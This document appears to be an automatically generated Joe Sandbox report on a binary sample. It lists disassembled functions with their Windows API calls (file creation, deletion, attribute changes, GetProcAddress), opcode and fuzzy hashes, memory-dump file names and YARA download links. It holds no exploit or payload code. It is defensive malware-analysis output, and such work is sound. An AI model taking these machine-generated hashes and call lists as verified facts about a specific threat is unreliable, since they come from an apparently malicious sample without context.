API String ID: 2773662609-671089009
Opcode ID: 3c32fa1527ae83cf0204b3ba97c6f592699d3b01c4d865ee043fd9a2d8046628
Instruction ID: 05e8efbd3275c1feed1be3fcc95eaab21e00bb722bcf07094123663e849690f9
Opcode Fuzzy Hash: 3c32fa1527ae83cf0204b3ba97c6f592699d3b01c4d865ee043fd9a2d8046628
Instruction Fuzzy Hash: 41E055B0B8526CBBD6146F649C068AEBB60DB26B20F014016FC0817241CF7C0E00A2DA

Uniqueness

Uniqueness Score: -1.00%

Function 0073329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 007332AF

Strings

FlsAlloc, xrefs: 0073329E, 007332A8

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: d8985d81380568b6a685cfeda167b16cbebb798829a98b69ef1e91514d033b02
Instruction ID: 765694e3a738642b4a43addff2919f1f31134c98ff583c9fd40030bc6e98c0db
Opcode Fuzzy Hash: d8985d81380568b6a685cfeda167b16cbebb798829a98b69ef1e91514d033b02
Instruction Fuzzy Hash: 1AD05B61782A78EBD52032D56C079AE7E448701FB6F460153FE0C5A143966D495041DA

Uniqueness

Uniqueness Score: -1.00%

Function 0072E1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072E20B

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Strings

3To, xrefs: 0072E1F9, 0072E205

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3To
API String ID: 1269201914-245939750
Opcode ID: 887fafe4385d70d0be77932f23d84b90d076de40e091fb994752997b1dbbc613
Instruction ID: addbbfdca8cdd00c2fd4ba4448326e85612b0bbe29e55be83fcfe705ed9c1434
Opcode Fuzzy Hash: 887fafe4385d70d0be77932f23d84b90d076de40e091fb994752997b1dbbc613
Instruction Fuzzy Hash: E6B012D126E021FC320C1104BF0AC36031CC4C0B90330C02EB52AD4082964C8D068032

Uniqueness

Uniqueness Score: -1.00%

Function 0073B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0073AF1B: GetOEMCP.KERNEL32(00000000,?,?,0073B1A5,?), ref: 0073AF46

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0073B1EA,?,00000000), ref: 0073B3C4
GetCPInfo.KERNEL32(00000000,0073B1EA,?,?,?,0073B1EA,?,00000000), ref: 0073B3D7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 4ac2ef6db1425b6b4e5155f63c1a7f25be7a92e9e5d201ee9676770fa5f19538
Instruction ID: 09ca7659f142e8ba1ca2925e113a22d944906b4e3ce017b6ababa27721bc2a23
Opcode Fuzzy Hash: 4ac2ef6db1425b6b4e5155f63c1a7f25be7a92e9e5d201ee9676770fa5f19538
Instruction Fuzzy Hash: 5D5154B0A002869EFB20CF71C8856BABBE5EF41310F18816ED2968B253D73DD945CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00711385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00711385

Part of subcall function 00716057: __EH_prolog.LIBCMT ref: 0071605C

Part of subcall function 0071C827: __EH_prolog.LIBCMT ref: 0071C82C
Part of subcall function 0071C827: new.LIBCMT ref: 0071C86F
Part of subcall function 0071C827: new.LIBCMT ref: 0071C893

new.LIBCMT ref: 007113FE

Part of subcall function 0071B07D: __EH_prolog.LIBCMT ref: 0071B082

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7f890099265e39b49b7fc938c01588cd9770e5cc044d9f40999371d1713abe01
Instruction ID: 701a8e7492f8bf0bb5ac4f2b98866837ded3e7d55e8131a35daf881e7c837da8
Opcode Fuzzy Hash: 7f890099265e39b49b7fc938c01588cd9770e5cc044d9f40999371d1713abe01
Instruction Fuzzy Hash: 854116B0805B40DEE724DF7984899E7FBE5FB18300F504A2ED6EE87282DB366594CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00711380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00711385

Part of subcall function 00716057: __EH_prolog.LIBCMT ref: 0071605C

Part of subcall function 0071C827: __EH_prolog.LIBCMT ref: 0071C82C
Part of subcall function 0071C827: new.LIBCMT ref: 0071C86F
Part of subcall function 0071C827: new.LIBCMT ref: 0071C893

new.LIBCMT ref: 007113FE

Part of subcall function 0071B07D: __EH_prolog.LIBCMT ref: 0071B082

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a17631331f814e222ed14b8a9aac2fb5c6e6d64f07dc81ef3f2c8ce83226c0df
Instruction ID: 00515ac2469fd0ec1ffb5fcb9bb428f02e2f5b9ab5767b919eae5151b087bf81
Opcode Fuzzy Hash: a17631331f814e222ed14b8a9aac2fb5c6e6d64f07dc81ef3f2c8ce83226c0df
Instruction Fuzzy Hash: 224106B0805B40DEE724DF798489AE7FAE5FB18300F504A2ED6EE83282DB366554CB15

Uniqueness

Uniqueness Score: -1.00%

Function 0071971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00719EDC,?,?,00717867), ref: 007197A6
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00719EDC,?,?,00717867), ref: 007197DB

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 76a2748c08c43b76c0b85f04525e7be15b755317b2b100179450b563fd848a32
Instruction ID: 6cc5e98aec4145f1b8d69aefdd150a36cc54931ee43373231ec332f5313bafd1
Opcode Fuzzy Hash: 76a2748c08c43b76c0b85f04525e7be15b755317b2b100179450b563fd848a32
Instruction Fuzzy Hash: 2321B4B1514748AED7309F68C885BE7B7E8EF49764F004A2DF6E5821D1C378AC898A61

Uniqueness

Uniqueness Score: -1.00%

Function 00719D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00717547,?,?,?,?), ref: 00719D7C
SetFileTime.KERNELBASE(?,?,?,?), ref: 00719E2C

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 725f66a2a20bcbea3a6ac2ce07ba63b3edaba63bb15b18e669367d27539ae47c
Instruction ID: 6d48433b99c99e33dd911789702b2763c5d1524048dc47955e5ffbd3c975cc6c
Opcode Fuzzy Hash: 725f66a2a20bcbea3a6ac2ce07ba63b3edaba63bb15b18e669367d27539ae47c
Instruction Fuzzy Hash: ED21F631248246ABC714DE28D862AEBBBE4AF52304F04491DF5C183191D32DDE4DCBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0073A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 0073A4B8
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 0073A4C5

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 78e429f3b23dfd4ad59f3d8bcbc759000190a6c5ed95f5524cd171fdcc6fdf9e
Instruction ID: b2abd647088af2b1acac67421852c330d5e2859bc5b4d3c9a73cd53e76b00c17
Opcode Fuzzy Hash: 78e429f3b23dfd4ad59f3d8bcbc759000190a6c5ed95f5524cd171fdcc6fdf9e
Instruction Fuzzy Hash: AE112B37601260ABBB219F2CEC4685A73A5AB81370F168211ED59AB246DB7CDC41C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 00719B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00719B35,?,?,00000000,?,?,00718D9C,?), ref: 00719BC0
GetLastError.KERNEL32 ref: 00719BCD

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 53667a8783be8b67b88c6d1ae68e3074afe0868ddd9dc19df47e127c89788817
Instruction ID: c3a7ef0c694fcfe8df511a43f8119d78606b824fb8db53f365eac7971a009400
Opcode Fuzzy Hash: 53667a8783be8b67b88c6d1ae68e3074afe0868ddd9dc19df47e127c89788817
Instruction Fuzzy Hash: 02010CB5308215DB8B28CE1DACA48FE7399AFC1721710852EFA16872D0D738D8469620

Uniqueness

Uniqueness Score: -1.00%

Function 00719E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00719E76
GetLastError.KERNEL32 ref: 00719E82

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 4e4205e63b2b08340cde9e903c1362cf1a5dc44cd4769859cdd24b3ad15ae7cf
Instruction ID: 2eb482468e7cb273982015c894be2c7963beb15b4502c1d771649849dc81d82c
Opcode Fuzzy Hash: 4e4205e63b2b08340cde9e903c1362cf1a5dc44cd4769859cdd24b3ad15ae7cf
Instruction Fuzzy Hash: 8E01B5723042005BEB34DE2DDC587ABB7D99B85715F144A3EB246C36D0DB79ED8D8610

Uniqueness

Uniqueness Score: -1.00%

Function 00738606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00738627

Part of subcall function 00738518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0073C13D,00000000,?,007367E2,?,00000008,?,007389AD,?,?,?), ref: 0073854A

HeapReAlloc.KERNEL32(00000000,?,?,?,?,00750F50,0071CE57,?,?,?,?,?,?), ref: 00738663

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 7dcf205ffd99af921688dd185e82e290d3144203d2728e54488df499a9494f7c
Instruction ID: 313fe337b0f4be7c929a965adfacc1c41e9784c8833711ee23035036f5379ff7
Opcode Fuzzy Hash: 7dcf205ffd99af921688dd185e82e290d3144203d2728e54488df499a9494f7c
Instruction Fuzzy Hash: BBF06232101315E7FBE12A25AC06B6F376C9FD27A0F288215F818971A3DF7DD90195A7

Uniqueness

Uniqueness Score: -1.00%

Function 00720908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00720915
GetProcessAffinityMask.KERNEL32(00000000), ref: 0072091C

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 112ea6bf61ba00f7cfaf7453db4e6bb488e5545b995a4ca14ab860365070415e
Instruction ID: 046718c08fc09f06442cc46a1dad781ddef2124c71e20aa87e03ccea3595e6fb
Opcode Fuzzy Hash: 112ea6bf61ba00f7cfaf7453db4e6bb488e5545b995a4ca14ab860365070415e
Instruction Fuzzy Hash: A7E09B36A11115AF6F05CBA4BC045BB739DDB05310710417AA84BD3103F638FD4186F4

Uniqueness

Uniqueness Score: -1.00%

Function 0071A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0071A27A,?,?,?,0071A113,?,00000001,00000000,?,?), ref: 0071A458
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0071A27A,?,?,?,0071A113,?,00000001,00000000,?,?), ref: 0071A489

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e7d99d084da4da44fc46d1da0aa37bba35dc0b1896c9910ca70402bfd4a42236
Instruction ID: 1a1ab9bedf7ace3b1a7501e80fe737c485855d1e8c32f36151aa8c16171bd868
Opcode Fuzzy Hash: e7d99d084da4da44fc46d1da0aa37bba35dc0b1896c9910ca70402bfd4a42236
Instruction Fuzzy Hash: 3CF0A03524124DBBDF119F64DC05FD9376DBB08381F048052BC8C861A2DB7A8AE8AA50

Uniqueness

Uniqueness Score: -1.00%

Function 0072D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0072D5A1
SetDlgItemTextW.USER32(00000065,?), ref: 0072D5B8

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: 2cc10d6653f87b0c7a944f98e46880332dbba207de15d1aceb439d6d9fab1468
Instruction ID: 84afa3bb1e532a6f78521cd6b55fa4d37c572528d003b1f6cdb36ca94853e353
Opcode Fuzzy Hash: 2cc10d6653f87b0c7a944f98e46880332dbba207de15d1aceb439d6d9fab1468
Instruction Fuzzy Hash: B0F0EC7150035CBBDB21AF71AC0BFE9375CAB04746F040695BA04A30E2DABD6EE08766

Uniqueness

Uniqueness Score: -1.00%

Function 0071A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,0071984C,?,?,00719688,?,?,?,?,00741FA1,000000FF), ref: 0071A13E
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0071984C,?,?,00719688,?,?,?,?,00741FA1,000000FF), ref: 0071A16C

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: f999ce381d27567fb6f21452de263d1451929ef43d1ef9738f857f3c7991f785
Instruction ID: b221014a33ed16a947160db9690af4aa288a09ef14ab1a8a093af602bdb9966e
Opcode Fuzzy Hash: f999ce381d27567fb6f21452de263d1451929ef43d1ef9738f857f3c7991f785
Instruction Fuzzy Hash: E5E0923964121CBBDB119F64DC45FE9776CAB09382F484066B888C30A1DB759DD4AA94

Uniqueness

Uniqueness Score: -1.00%

Function 0072A39D Relevance: 3.0, APIs: 2, Instructions: 27comCOMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00741FA1,000000FF), ref: 0072A3D1
OleUninitialize.OLE32(?,?,?,?,00741FA1,000000FF), ref: 0072A3D6

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 2d7aa41bcad295e261ef30c46ade699963c7894f1224d8e48f7fff73aefcae9d
Instruction ID: 12e75764fb3ea7c32994a96839048fa31d2e6697e1960abe7b4cac126b6c09d9
Opcode Fuzzy Hash: 2d7aa41bcad295e261ef30c46ade699963c7894f1224d8e48f7fff73aefcae9d
Instruction Fuzzy Hash: E9F03072518654DFC710AB4CEC05B55FBA8FB49B60F04836AF41993760CB786801CA95

Uniqueness

Uniqueness Score: -1.00%

Function 0071A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0071A189,?,007176B2,?,?,?,?), ref: 0071A1A5
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0071A189,?,007176B2,?,?,?,?), ref: 0071A1D1

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b243133eaf340fd6fd5fb933963b83c1643bf9464895c2cd3391f54b6d43ebf7
